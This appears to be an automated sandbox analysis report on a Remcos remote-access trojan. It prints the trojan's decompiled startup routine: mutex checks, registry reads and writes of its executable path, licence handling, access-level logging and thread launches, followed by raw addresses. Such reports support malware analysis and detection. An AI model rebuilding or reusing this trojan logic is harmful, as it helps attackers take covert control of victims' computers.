                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE5E
                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE6F
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE72
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE80
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040CE83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Remcos-36FQQT$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                                                                                                • API String ID: 551388010-3591396675
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E0040C2E2(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
                                                                                                				char _v524;
                                                                                                				char _v700;
                                                                                                				char _v720;
                                                                                                				char _v724;
                                                                                                				char _v728;
                                                                                                				char _v744;
                                                                                                				char _v756;
                                                                                                				char _v760;
                                                                                                				char _v772;
                                                                                                				struct _SECURITY_ATTRIBUTES* _v776;
                                                                                                				signed int _v780;
                                                                                                				char _v784;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t71;
                                                                                                				void* _t78;
                                                                                                				void** _t86;
                                                                                                				void* _t90;
                                                                                                				CHAR* _t93;
                                                                                                				long _t95;
                                                                                                				int _t97;
                                                                                                				char _t100;
                                                                                                				void* _t101;
                                                                                                				void* _t105;
                                                                                                				void* _t121;
                                                                                                				void* _t122;
                                                                                                				void* _t129;
                                                                                                				char _t135;
                                                                                                				char* _t140;
                                                                                                				signed char* _t142;
                                                                                                				signed char* _t144;
                                                                                                				void* _t147;
                                                                                                				void* _t149;
                                                                                                				void* _t166;
                                                                                                				intOrPtr _t168;
                                                                                                				void* _t169;
                                                                                                				intOrPtr _t185;
                                                                                                				intOrPtr* _t188;
                                                                                                				void* _t190;
                                                                                                				void* _t196;
                                                                                                				char* _t199;
                                                                                                				void* _t202;
                                                                                                				char* _t206;
                                                                                                				void* _t213;
                                                                                                				signed short* _t217;
                                                                                                				void* _t218;
                                                                                                				void* _t219;
                                                                                                				signed int _t220;
                                                                                                				CHAR* _t227;
                                                                                                				void* _t229;
                                                                                                				char* _t232;
                                                                                                				char* _t234;
                                                                                                				intOrPtr* _t236;
                                                                                                				void* _t238;
                                                                                                				intOrPtr* _t243;
                                                                                                				intOrPtr* _t247;
                                                                                                				void* _t249;
                                                                                                				void* _t250;
                                                                                                				void* _t257;
                                                                                                				void* _t268;
                                                                                                				void* _t271;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t272;
                                                                                                				int _t275;
                                                                                                				char* _t365;
                                                                                                				signed int _t387;
                                                                                                				signed int _t391;
                                                                                                				int _t393;
                                                                                                				signed int _t399;
                                                                                                				signed int _t402;
                                                                                                				intOrPtr _t428;
                                                                                                				void* _t438;
                                                                                                				void* _t440;
                                                                                                				signed int _t457;
                                                                                                				void* _t460;
                                                                                                				char* _t466;
                                                                                                				void* _t467;
                                                                                                				char* _t470;
                                                                                                				void* _t472;
                                                                                                				void* _t477;
                                                                                                				char* _t482;
                                                                                                				intOrPtr* _t486;
                                                                                                				void* _t489;
                                                                                                				void* _t490;
                                                                                                				void* _t491;
                                                                                                				signed int _t497;
                                                                                                				void* _t500;
                                                                                                				void* _t501;
                                                                                                				void* _t502;
                                                                                                				void* _t504;
                                                                                                				void* _t506;
                                                                                                				void* _t507;
                                                                                                				void* _t508;
                                                                                                				void* _t509;
                                                                                                				void* _t510;
                                                                                                				void* _t514;
                                                                                                
                                                                                                				_t449 = __edx;
                                                                                                				 *0x46dd1c = _a4;
                                                                                                				_push(_t271);
                                                                                                				E0040CC9F( &_v724, __edx, __eflags); // executed
                                                                                                				_t500 = (_t497 & 0xfffffff8) - 0x2f4;
                                                                                                				E004020DE(_t271, _t500, __edx, __eflags, 0x46e620);
                                                                                                				_t501 = _t500 - 0x18;
                                                                                                				E004020DE(_t271, _t501, __edx, __eflags,  &_v728);
                                                                                                				_t71 = E00417E68( &_v756, __edx);
                                                                                                				_t502 = _t501 + 0x30;
                                                                                                				E0040D4A2(__edx, _t71);
                                                                                                				E00401E66( &_v760, __edx);
                                                                                                				_t287 = _a12;
                                                                                                				if( *_a12 != 0x2d) {
                                                                                                					L6:
                                                                                                					_t466 = 0x46e3a4;
                                                                                                					__eflags =  *((char*)(E00401F87(E00401E3B(0x46e3a4, _t449, __eflags, 3))));
                                                                                                					 *0x46daf5 = __eflags != 0;
                                                                                                					_t78 = E004076BB(_t271,  &_v756, E00405416( &_v780, "Software\\", __eflags, E00401E3B(0x46e3a4, _t449, __eflags, 0xe)), 0x46e3a4, __eflags, "\\");
                                                                                                					_t476 = 0x46e5a8;
                                                                                                					E00401FC3(0x46e5a8, _t77, 0x46e5a8, _t78);
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00405BB7(_t271, 0x46e650, "Exe");
                                                                                                					_t272 = 0;
                                                                                                					E00401E3B(0x46e3a4, _t77, __eflags, 0x32);
                                                                                                					__eflags =  *(E004052CF(0));
                                                                                                					 *0x46dd42 = __eflags != 0;
                                                                                                					E00401E3B(0x46e3a4, _t77, __eflags, 0x33);
                                                                                                					_t86 = E004052CF(0);
                                                                                                					__eflags =  *_t86;
                                                                                                					 *0x46dd43 =  *_t86 != 0;
                                                                                                					__eflags =  *0x46dd42 - _t272; // 0x0
                                                                                                					if(__eflags == 0) {
                                                                                                						L8:
                                                                                                						_v776 = _t272;
                                                                                                						_t477 = OpenMutexA(0x100000, _t272, "Remcos_Mutex_Inj");
                                                                                                						__eflags = _t477;
                                                                                                						if(_t477 != 0) {
                                                                                                							WaitForSingleObject(_t477, 0xea60);
                                                                                                							CloseHandle(_t477);
                                                                                                						}
                                                                                                						_t452 = E00401F87(0x46e5a8); // executed
                                                                                                						_t90 = E004108B4(_t89, "Inj",  &_v776); // executed
                                                                                                						__eflags = _t90;
                                                                                                						if(__eflags != 0) {
                                                                                                							_t452 = E00401F87(0x46e5a8);
                                                                                                							E00410D11(_t262, __eflags, "Inj");
                                                                                                						}
                                                                                                						E00401F9F(0x46e5d8, E00401E3B(_t466, _t452, __eflags, 0xe));
                                                                                                						_t93 = E00401F87(0x46e5d8);
                                                                                                						_t467 = 0;
                                                                                                						_t275 = 1;
                                                                                                						CreateMutexA(0, 1, _t93); // executed
                                                                                                						_t95 = GetLastError();
                                                                                                						__eflags = _t95 - 0xb7;
                                                                                                						if(_t95 == 0xb7) {
                                                                                                							L45:
                                                                                                							E00401FB9();
                                                                                                							_t97 = _t275;
                                                                                                							goto L5;
                                                                                                						} else {
                                                                                                							E0040CD53();
                                                                                                							GetModuleFileNameW(0, "C:\Users\jones\AppData\Local\Temp\rem9090sta.exe", 0x104);
                                                                                                							_t100 = E00418004(0x46e5d8);
                                                                                                							_push(0x46e5d8);
                                                                                                							_t453 = 0x80000002;
                                                                                                							 *0x46dea8 = _t100;
                                                                                                							_t101 = E00410911( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                                                                                                							_t504 = _t502 + 0xc;
                                                                                                							E00401FC3(0x46e638, 0x80000002, 0x46e638, _t101);
                                                                                                							E00401FB9();
                                                                                                							__eflags =  *0x46dea8;
                                                                                                							if( *0x46dea8 == 0) {
                                                                                                								_push(" (32 bit)");
                                                                                                							} else {
                                                                                                								_push(" (64 bit)");
                                                                                                							}
                                                                                                							E00405479(_t275, 0x46e638, _t467);
                                                                                                							_t105 =  *0x46dd14;
                                                                                                							__eflags = _t105;
                                                                                                							if(_t105 != 0) {
                                                                                                								 *0x46c9c0 =  *_t105();
                                                                                                							}
                                                                                                							_t482 = 0x46e3a4;
                                                                                                							__eflags = _v776 - _t467;
                                                                                                							if(__eflags == 0) {
                                                                                                								_t438 = E00401E3B(0x46e3a4, _t453, __eflags, 0x2e);
                                                                                                								__eflags =  *((char*)(E00401F87(_t438)));
                                                                                                								if(__eflags != 0) {
                                                                                                									__eflags =  *0x46dd14 - _t467; // 0x7536e630
                                                                                                									if(__eflags != 0) {
                                                                                                										__eflags =  *0x46c9c0 - _t467; // 0x1
                                                                                                										if(__eflags == 0) {
                                                                                                											_t453 = E00401F87(0x46e5a8);
                                                                                                											_t257 = E0041086A(0x46e5a8, _t256, "origmsc");
                                                                                                											_pop(_t440);
                                                                                                											__eflags = _t257;
                                                                                                											if(__eflags == 0) {
                                                                                                												E00406114(_t275, _t440, _t453);
                                                                                                											}
                                                                                                										} else {
                                                                                                											_push(_t438);
                                                                                                											_push(_t438);
                                                                                                											__eflags = E0040A748() - 0xffffffff;
                                                                                                											if(__eflags == 0) {
                                                                                                												E0040620E(__eflags); // executed
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 0x27))));
                                                                                                							if(__eflags != 0) {
                                                                                                								E0040D441(); // executed
                                                                                                							}
                                                                                                							E00409DFE(_t275, 0x46e578, E00401F87(E00401E3B(_t482, _t453, __eflags, 0xb)));
                                                                                                							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 4))));
                                                                                                							 *0x46daf6 = __eflags != 0;
                                                                                                							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 5))));
                                                                                                							 *0x46daef = __eflags != 0;
                                                                                                							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 8))));
                                                                                                							 *0x46daf4 = __eflags != 0;
                                                                                                							__eflags =  *((char*)(E00401F87(E00401E3B(_t482, _t453, __eflags, 3))));
                                                                                                							if(__eflags != 0) {
                                                                                                								_t243 = E00401F87(E00401E3B(_t482, _t453, __eflags, 0x30));
                                                                                                								_t25 = _t243 + 2; // 0x2
                                                                                                								_t453 = _t25;
                                                                                                								do {
                                                                                                									_t428 =  *_t243;
                                                                                                									_t243 = _t243 + 2;
                                                                                                									__eflags = _t428 - _t467;
                                                                                                								} while (_t428 != _t467);
                                                                                                								__eflags = _t243 - _t453;
                                                                                                								if(__eflags != 0) {
                                                                                                									_t247 = E00401F87(E00401E3B(_t482, _t453, __eflags, 9));
                                                                                                									_t249 = E00401F87(E00401E3B(0x46e3a4, _t453, __eflags, 0x30));
                                                                                                									_t453 =  *_t247;
                                                                                                									_t250 = E00418A4B( &_v780,  *_t247, _t249); // executed
                                                                                                									E00401EEC(0x46e5c0,  *_t247, _t247, _t250);
                                                                                                									E00401EE2();
                                                                                                									_t482 = 0x46e3a4;
                                                                                                								}
                                                                                                							}
                                                                                                							__eflags = _v776 - _t467;
                                                                                                							if(_v776 != _t467) {
                                                                                                								E00432D80(_t467,  &_v524, _t467, 0x208);
                                                                                                								_t121 = E0040247B();
                                                                                                								_t122 = E00401F87(0x46e5f0);
                                                                                                								_t454 = E00401F87(0x46e5a8);
                                                                                                								E00410A5F(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
                                                                                                								_t506 = _t504 + 0x20;
                                                                                                								E00409DFE(_t275, 0x46e590,  &_v524);
                                                                                                								_t470 = 0x46e3a4;
                                                                                                								goto L47;
                                                                                                							} else {
                                                                                                								__eflags =  *0x46daf5;
                                                                                                								if(__eflags == 0) {
                                                                                                									E00409DFE(_t275, 0x46e590, "C:\Users\jones\AppData\Local\Temp\rem9090sta.exe");
                                                                                                								} else {
                                                                                                									_t232 = E00401F87(E00401E3B(_t482, _t453, __eflags, 0x1e));
                                                                                                									_t234 = E00401F87(E00401E3B(_t482, _t453, __eflags, 0xc));
                                                                                                									_t236 = E00401F87(E00401E3B(0x46e3a4, _t453, __eflags, 9));
                                                                                                									__eflags =  *_t232;
                                                                                                									__eflags =  *_t234;
                                                                                                									_t482 = 0x46e3a4;
                                                                                                									_t238 = E00401F87(E00401E3B(0x46e3a4, _t453,  *_t234, 0xa));
                                                                                                									E0040A9AB( *_t236, E00401F87(E00401E3B(0x46e3a4, _t453, __eflags, 0x30)), _t238, ((_t235 & 0xffffff00 |  *_t232 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t235 & 0xffffff00 |  *_t232 != 0x00000000) & 0x000000ff); // executed
                                                                                                									_t504 = _t504 + 0xc;
                                                                                                									_t275 = 1;
                                                                                                									_t467 = 0;
                                                                                                								}
                                                                                                								_t213 = E0040247B();
                                                                                                								_t457 = 2;
                                                                                                								_t399 =  ~(0 | __eflags > 0x00000000) | (_t213 + 0x00000001) * _t457;
                                                                                                								_push(_t399);
                                                                                                								_v780 = _t399;
                                                                                                								_t491 = E0043021B(_t399, (_t213 + 1) * _t457 >> 0x20, _t482, __eflags);
                                                                                                								__eflags = _t491;
                                                                                                								if(_t491 == 0) {
                                                                                                									_t491 = _t467;
                                                                                                								} else {
                                                                                                									E00432D80(_t467, _t491, _t467, _v780);
                                                                                                									_t504 = _t504 + 0xc;
                                                                                                								}
                                                                                                								_t217 = E00401EDD(0x46e590);
                                                                                                								_t460 = _t491 - _t217;
                                                                                                								__eflags = _t460;
                                                                                                								_t472 = 2;
                                                                                                								do {
                                                                                                									_t402 =  *_t217 & 0x0000ffff;
                                                                                                									 *(_t217 + _t460) = _t402;
                                                                                                									_t217 = _t217 + _t472;
                                                                                                									__eflags = _t402;
                                                                                                								} while (_t402 != 0);
                                                                                                								_push(_t402);
                                                                                                								_t218 = E0040247B();
                                                                                                								_t219 = E00401F87(0x46e5f0);
                                                                                                								_t220 = E0040247B();
                                                                                                								E00410CAF(E00401F87(0x46e5a8), __eflags, "exepath", _t491, 2 + _t220 * 2, _t219, _t218);
                                                                                                								E00430224(_t491);
                                                                                                								_t506 = _t504 + 0x1c;
                                                                                                								_t470 = 0x46e3a4;
                                                                                                								E00401E3B(0x46e3a4, _t222, __eflags, 0xd);
                                                                                                								_t454 = "0";
                                                                                                								__eflags = E0040EB23(__eflags);
                                                                                                								if(__eflags == 0) {
                                                                                                									L47:
                                                                                                									_push(_t275);
                                                                                                									_t129 = E00401F87(E00401E3B(_t470, _t454, __eflags, 0x34));
                                                                                                									_t507 = _t506 - 0x18;
                                                                                                									E00402076(_t275, _t507, _t129);
                                                                                                									_push("licence");
                                                                                                									_t455 = E00401F87(0x46e5a8);
                                                                                                									E00410AD6(0x46e5a8, _t131);
                                                                                                									_t508 = _t507 + 0x20;
                                                                                                									_t135 = E004374E4(_t133, E00401F87(E00401E3B(_t470, _t131, __eflags, 0x28)));
                                                                                                									 *0x46daf7 = _t135;
                                                                                                									__eflags = _t135 - 2;
                                                                                                									if(_t135 != 2) {
                                                                                                										__eflags = _t135 - _t275;
                                                                                                										if(_t135 == _t275) {
                                                                                                											_t393 = 0;
                                                                                                											__eflags = 0;
                                                                                                											goto L51;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t393 = _t275;
                                                                                                										L51:
                                                                                                										E004199B8(_t275, _t393, _t455);
                                                                                                										__eflags = 0;
                                                                                                										CreateThread(0, 0, E00419787, 0, 0, 0);
                                                                                                									}
                                                                                                									_t509 = _t508 - 0x18;
                                                                                                									E00402076(_t275, _t509, "Remcos Agent initialized");
                                                                                                									_t510 = _t509 - 0x18;
                                                                                                									E00402076(_t275, _t510, "i");
                                                                                                									E00417670(_t275, _t470);
                                                                                                									_t502 = _t510 + 0x30;
                                                                                                									_t140 = E00401F87(E00401E3B(_t470, _t455, __eflags, 0x37));
                                                                                                									_t142 = E00401F87(E00401E3B(_t470, _t455, __eflags, 0x10));
                                                                                                									_t144 = E00401F87(E00401E3B(_t470, _t455, __eflags, 0xf));
                                                                                                									__eflags =  *_t140;
                                                                                                									_t476 = 0x46e3a4;
                                                                                                									_t147 = E004374E4(_t145, E00401F87(E00401E3B(0x46e3a4, _t455,  *_t140, 0x36)));
                                                                                                									_t149 = E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x11));
                                                                                                									E004084B0(_t142,  *_t144 & 0x000000ff,  *_t142 & 0x000000ff, E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x31)), _t149, _t147, (_t143 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
                                                                                                									__eflags =  *((intOrPtr*)(E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x14)))) - 1;
                                                                                                									if(__eflags != 0) {
                                                                                                										_t466 = CreateThread;
                                                                                                									} else {
                                                                                                										_t202 = 2;
                                                                                                										_t490 = E0042FF6D(_t455, 0x46e3a4, __eflags, _t202);
                                                                                                										 *_t490 = 0;
                                                                                                										_t391 = E00401E3B(0x46e3a4, _t455, __eflags, 0x35);
                                                                                                										_t206 = E00401F87(_t391);
                                                                                                										_t466 = CreateThread;
                                                                                                										__eflags =  *_t206;
                                                                                                										 *((char*)(_t490 + 1)) = _t391 & 0xffffff00 | __eflags != 0x00000000;
                                                                                                										CreateThread(0, 0, E0041630B, _t490, 0, 0);
                                                                                                										_t476 = 0x46e3a4;
                                                                                                									}
                                                                                                									__eflags =  *((intOrPtr*)(E00401F87(E00401E3B(_t476, _t455, __eflags, 0x16)))) - 1;
                                                                                                									if(__eflags == 0) {
                                                                                                										_t196 = 2;
                                                                                                										_t489 = E0042FF6D(_t455, _t476, __eflags, _t196);
                                                                                                										 *_t489 = 1;
                                                                                                										_t387 = E00401E3B(0x46e3a4, _t455, __eflags, 0x35);
                                                                                                										_t199 = E00401F87(_t387);
                                                                                                										__eflags =  *_t199;
                                                                                                										__eflags = 0;
                                                                                                										 *((char*)(_t489 + 1)) = _t387 & 0xffffff00 |  *_t199 != 0x00000000;
                                                                                                										CreateThread(0, 0, E0041630B, _t489, 0, 0);
                                                                                                										_t476 = 0x46e3a4;
                                                                                                									}
                                                                                                									__eflags =  *((intOrPtr*)(E00401F87(E00401E3B(_t476, _t455, __eflags, 0x23)))) - 1;
                                                                                                									if(__eflags == 0) {
                                                                                                										 *0x46da75 = 1;
                                                                                                										_t188 = E00401F87(E00401E3B(_t476, _t455, __eflags, 0x25));
                                                                                                										_t190 = E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x26));
                                                                                                										_t455 =  *_t188;
                                                                                                										E00401EEC(0x46e0d4,  *_t188, _t188, E004189FF( &_v780,  *_t188, _t190));
                                                                                                										E00401EE2();
                                                                                                										__eflags = 0;
                                                                                                										CreateThread(0, 0, E00401BBF, 0, 0, 0);
                                                                                                										_t476 = 0x46e3a4;
                                                                                                									}
                                                                                                									__eflags =  *((intOrPtr*)(E00401F87(E00401E3B(_t476, _t455, __eflags, 0x2b)))) - 1;
                                                                                                									if(__eflags == 0) {
                                                                                                										_t476 = E00401F87(E00401E3B(_t476, _t455, __eflags, 0x2c));
                                                                                                										_t185 = E004374E4(_t183, E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x2d)));
                                                                                                										__eflags =  *_t476;
                                                                                                										_t455 = _t185;
                                                                                                										__eflags =  *_t476 != 0;
                                                                                                										E0040A6AE(_t185);
                                                                                                									}
                                                                                                									E00401EEC(0x46e608, _t455, _t476, E0041778E( &_v772, _t466, __eflags));
                                                                                                									_t365 =  &_v776;
                                                                                                									E00401EE2();
                                                                                                									_t166 =  *0x46dd08;
                                                                                                									_t272 = 0;
                                                                                                									__eflags = _t166;
                                                                                                									if(_t166 != 0) {
                                                                                                										 *_t166(0);
                                                                                                									}
                                                                                                									CreateThread(_t272, _t272, E0040D0FF, _t272, _t272, _t272);
                                                                                                									__eflags =  *0x46dd42;
                                                                                                									if( *0x46dd42 != 0) {
                                                                                                										CreateThread(_t272, _t272, E0040FB05, _t272, _t272, _t272);
                                                                                                									}
                                                                                                									__eflags =  *0x46dd43;
                                                                                                									if( *0x46dd43 != 0) {
                                                                                                										CreateThread(_t272, _t272, E00410023, _t272, _t272, _t272);
                                                                                                									}
                                                                                                									_t168 =  *0x46c9c0; // 0x1
                                                                                                									_t169 = _t168 - _t272;
                                                                                                									__eflags = _t169;
                                                                                                									if(__eflags == 0) {
                                                                                                										goto L71;
                                                                                                									} else {
                                                                                                										__eflags = _t169 - 1;
                                                                                                										if(__eflags == 0) {
                                                                                                											_push("Administrator");
                                                                                                											goto L72;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L73;
                                                                                                								} else {
                                                                                                									_t227 = E00401E3B(0x46e3a4, "0", __eflags, 0xd);
                                                                                                									_t514 = _t506 - 0x18;
                                                                                                									_t454 = _t227;
                                                                                                									E00417CCA(_t514, _t227);
                                                                                                									_t229 = E0040CE8E(__eflags);
                                                                                                									_t506 = _t514 + 0x18;
                                                                                                									__eflags = _t229 - _t275;
                                                                                                									if(__eflags != 0) {
                                                                                                										goto L47;
                                                                                                									} else {
                                                                                                										_t275 = 3;
                                                                                                										goto L45;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_v780 = 0;
                                                                                                						_t268 = E004108B4(E00401F87(0x46e5a8), "WD",  &_v780);
                                                                                                						__eflags = _t268;
                                                                                                						if(_t268 != 0) {
                                                                                                							E00410D11(E00401F87(0x46e5a8), __eflags, "WD");
                                                                                                							E0040FDD3();
                                                                                                							L71:
                                                                                                							_push("User");
                                                                                                							L72:
                                                                                                							E004053F2(_t272, _t502 - 0x18, "Access Level: ", _t466, __eflags, E00402076(_t272,  &_v776));
                                                                                                							E00402076(_t272, _t502 - 4, "i");
                                                                                                							E00417670(_t272, _t466);
                                                                                                							_t365 =  &_v784;
                                                                                                							E00401FB9();
                                                                                                							L73:
                                                                                                							E004122C9();
                                                                                                							asm("int3");
                                                                                                							_push(_t476);
                                                                                                							_t486 = _t365 + 0x68;
                                                                                                							E0040D55F(_t272, _t486, _t486);
                                                                                                							_t287 = _t486;
                                                                                                							 *_t287 = 0x461828;
                                                                                                							 *_t287 = 0x4617e4;
                                                                                                							return E00431253(_t287);
                                                                                                						} else {
                                                                                                							goto L8;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
                                                                                                					if(__eflags != 0) {
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						__eax =  *(__ecx + 2) & 0x000000ff;
                                                                                                						__eflags = __al;
                                                                                                						if(__eflags != 0) {
                                                                                                							goto L6;
                                                                                                						} else {
                                                                                                							_push(__ecx);
                                                                                                							_push(__ecx);
                                                                                                							__ecx =  &_v700;
                                                                                                							__eax = E0040D58E( &_v700, __edx, __eflags, "license_code.txt", 2);
                                                                                                							__ecx = 0x46e3a4;
                                                                                                							__ecx = E00401E3B(0x46e3a4, __edx, __eflags, 0x34);
                                                                                                							__edx = __eax;
                                                                                                							__ecx =  &_v720;
                                                                                                							__eax = E0040E905( &_v720, __edx, __eflags);
                                                                                                							__ecx =  &_v720;
                                                                                                							__eax = E0040D53F( &_v720, __edx, __eflags);
                                                                                                							__ecx =  &_v720;
                                                                                                							L74();
                                                                                                							__ecx =  &_v744;
                                                                                                							E00401FB9() = 0;
                                                                                                							__eax = 1;
                                                                                                							__eflags = 1;
                                                                                                							L5:
                                                                                                							return _t97;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                 			}
                                                                                                0x0040c500
                                                                                                0x0040c508
                                                                                                0x0040c50a
                                                                                                0x0040c50d
                                                                                                0x0040c513
                                                                                                0x0040c519
                                                                                                0x0040c51e
                                                                                                0x0040c8a1
                                                                                                0x0040c8a5
                                                                                                0x0040c8aa
                                                                                                0x00000000
                                                                                                0x0040c524
                                                                                                0x0040c524
                                                                                                0x0040c534
                                                                                                0x0040c53a
                                                                                                0x0040c53f
                                                                                                0x0040c54a
                                                                                                0x0040c54f
                                                                                                0x0040c558
                                                                                                0x0040c55d
                                                                                                0x0040c568
                                                                                                0x0040c571
                                                                                                0x0040c576
                                                                                                0x0040c57f
                                                                                                0x0040c588
                                                                                                0x0040c581
                                                                                                0x0040c581
                                                                                                0x0040c581
                                                                                                0x0040c58d
                                                                                                0x0040c592
                                                                                                0x0040c597
                                                                                                0x0040c599
                                                                                                0x0040c59d
                                                                                                0x0040c59d
                                                                                                0x0040c5a2
                                                                                                0x0040c5a7
                                                                                                0x0040c5ab
                                                                                                0x0040c5b6
                                                                                                0x0040c5bd
                                                                                                0x0040c5c0
                                                                                                0x0040c5c2
                                                                                                0x0040c5c8
                                                                                                0x0040c5ca
                                                                                                0x0040c5d0
                                                                                                0x0040c5f4
                                                                                                0x0040c5f6
                                                                                                0x0040c5fb
                                                                                                0x0040c5fc
                                                                                                0x0040c5fe
                                                                                                0x0040c600
                                                                                                0x0040c600
                                                                                                0x0040c5d2
                                                                                                0x0040c5d2
                                                                                                0x0040c5d3
                                                                                                0x0040c5d9
                                                                                                0x0040c5dc
                                                                                                0x0040c5de
                                                                                                0x0040c5de
                                                                                                0x0040c5dc
                                                                                                0x0040c5d0
                                                                                                0x0040c5c8
                                                                                                0x0040c5c0
                                                                                                0x0040c615
                                                                                                0x0040c618
                                                                                                0x0040c61a
                                                                                                0x0040c61a
                                                                                                0x0040c635
                                                                                                0x0040c64e
                                                                                                0x0040c651
                                                                                                0x0040c668
                                                                                                0x0040c66b
                                                                                                0x0040c682
                                                                                                0x0040c685
                                                                                                0x0040c698
                                                                                                0x0040c69b
                                                                                                0x0040c6a8
                                                                                                0x0040c6ad
                                                                                                0x0040c6ad
                                                                                                0x0040c6b0
                                                                                                0x0040c6b0
                                                                                                0x0040c6b3
                                                                                                0x0040c6b6
                                                                                                0x0040c6b6
                                                                                                0x0040c6bb
                                                                                                0x0040c6bf
                                                                                                0x0040c6cc
                                                                                                0x0040c6e1
                                                                                                0x0040c6e6
                                                                                                0x0040c6ed
                                                                                                0x0040c6f9
                                                                                                0x0040c702
                                                                                                0x0040c707
                                                                                                0x0040c707
                                                                                                0x0040c6bf
                                                                                                0x0040c70c
                                                                                                0x0040c710
                                                                                                0x0040c8c0
                                                                                                0x0040c8cf
                                                                                                0x0040c8d7
                                                                                                0x0040c8f5
                                                                                                0x0040c8f7
                                                                                                0x0040c8fc
                                                                                                0x0040c90c
                                                                                                0x0040c911
                                                                                                0x00000000
                                                                                                0x0040c716
                                                                                                0x0040c716
                                                                                                0x0040c71d
                                                                                                0x0040c7b3
                                                                                                0x0040c723
                                                                                                0x0040c72e
                                                                                                0x0040c740
                                                                                                0x0040c755
                                                                                                0x0040c75a
                                                                                                0x0040c762
                                                                                                0x0040c768
                                                                                                0x0040c780
                                                                                                0x0040c79a
                                                                                                0x0040c7a1
                                                                                                0x0040c7a4
                                                                                                0x0040c7a5
                                                                                                0x0040c7a5
                                                                                                0x0040c7bd
                                                                                                0x0040c7c7
                                                                                                0x0040c7cf
                                                                                                0x0040c7d1
                                                                                                0x0040c7d2
                                                                                                0x0040c7db
                                                                                                0x0040c7de
                                                                                                0x0040c7e0
                                                                                                0x0040c7f2
                                                                                                0x0040c7e2
                                                                                                0x0040c7e8
                                                                                                0x0040c7ed
                                                                                                0x0040c7ed
                                                                                                0x0040c7f9
                                                                                                0x0040c802
                                                                                                0x0040c802
                                                                                                0x0040c804
                                                                                                0x0040c805
                                                                                                0x0040c805
                                                                                                0x0040c808
                                                                                                0x0040c80c
                                                                                                0x0040c80e
                                                                                                0x0040c80e
                                                                                                0x0040c813
                                                                                                0x0040c81b
                                                                                                0x0040c823
                                                                                                0x0040c82e
                                                                                                0x0040c84d
                                                                                                0x0040c853
                                                                                                0x0040c858
                                                                                                0x0040c85b
                                                                                                0x0040c864
                                                                                                0x0040c869
                                                                                                0x0040c875
                                                                                                0x0040c877
                                                                                                0x0040c916
                                                                                                0x0040c916
                                                                                                0x0040c922
                                                                                                0x0040c927
                                                                                                0x0040c92d
                                                                                                0x0040c932
                                                                                                0x0040c941
                                                                                                0x0040c943
                                                                                                0x0040c948
                                                                                                0x0040c95c
                                                                                                0x0040c967
                                                                                                0x0040c96d
                                                                                                0x0040c96f
                                                                                                0x0040c975
                                                                                                0x0040c977
                                                                                                0x0040c979
                                                                                                0x0040c979
                                                                                                0x00000000
                                                                                                0x0040c979
                                                                                                0x0040c971
                                                                                                0x0040c971
                                                                                                0x0040c97b
                                                                                                0x0040c97b
                                                                                                0x0040c980
                                                                                                0x0040c98c
                                                                                                0x0040c98c
                                                                                                0x0040c98e
                                                                                                0x0040c998
                                                                                                0x0040c99d
                                                                                                0x0040c9a7
                                                                                                0x0040c9ac
                                                                                                0x0040c9b1
                                                                                                0x0040c9bf
                                                                                                0x0040c9d1
                                                                                                0x0040c9e3
                                                                                                0x0040c9e8
                                                                                                0x0040c9ed
                                                                                                0x0040ca0a
                                                                                                0x0040ca1c
                                                                                                0x0040ca3b
                                                                                                0x0040ca53
                                                                                                0x0040ca55
                                                                                                0x0040ca9e
                                                                                                0x0040ca57
                                                                                                0x0040ca59
                                                                                                0x0040ca60
                                                                                                0x0040ca6c
